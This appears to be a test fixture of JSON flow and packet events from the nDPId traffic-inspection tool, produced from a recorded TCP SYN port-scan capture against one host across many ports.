+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsP6EAACcG4dGsEAAIQA2GNIzSxUTdUoMYAAAAAGACEABjSgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAslXMAACkGif+sEAAIQA2GNIzSEVvdUoMYAAAAAGACCAAfNAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfHcAACsGoPusEAAIQA2GNIzSB2zdUoMYAAAAAGACEAAhIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMoAADgG76isEAAIQA2GNIzSBHHdUoMYAAAAAGACBAAwHgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsI7sAADYG7resEAAIQA2GNIzSI3ndUoMYAAAAAGACDAAJFgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAseE4AACgGqCSsEAAIQA2GNIzSFqrdUoMYAAAAAGACBAAd5QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsC6AAAC8GDdOsEAAIQA2GNIzSTVndUoMYAAAAAGACEADbNQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+4AADAGNISsEAAIQA2GNIzSBaPdUoMYAAAAAGACBAAu7AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDsAACwGvDesEAAIQA2GNIzSgA\/dUoMYAAAAAGACBAC0fwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsO94AADgG1JSsEAAIQA2GNIzTGiHdU4MZAAAAAGACBAAaawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsafYAAC8Gr3ysEAAIQA2GNIzTD4PdU4MZAAAAAGACEAAZCQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NEAAC8GHKGsEAAIQA2GNIzTwAbdU4MZAAAAAGACEABohQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YEAACUGUfGsEAAIQA2GNIzTRrXdU4MZAAAAAGACCADp1gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsJvQAACcG+n6sEAAIQA2GNIzT\/KjdU4MZAAAAAGACEAAr4wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsu4wAADEGW+asEAAIQA2GNIzTB9ndU4MZAAAAAGACCAAoswAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsomcAADMGcwusEAAIQA2GNIzTAsHdU4MZAAAAAGACEAAlywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsV\/gAADMGvXqsEAAIQA2GNIzTBKLdU4MZAAAAAGACEAAj6gAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAszxkAACsGTlmsEAAIQA2GNIzTbindU4MZAAAAAGACEAC6YgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsqCgAACgGeEqsEAAIQA2GNIzTG1rdU4MZAAAAAGACBAAZMgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsXyMAACgGwU+sEAAIQA2GNIzTbEPdU4MZAAAAAGACBADISAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsoekAADkGbYmsEAAIQA2GNIzTBBbdU4MZAAAAAGACCAAsdgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsYoQAACsGuu6sEAAIQA2GNIzTAAHdU4MZAAAAAGACEAAoiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/nEAACkGIQGsEAAIQA2GNIzTJR7dU4MZAAAAAGACCAALbgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsszoAADkGXDisEAAIQA2GNIzTF2PdU4MZAAAAAGACCAAZKQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
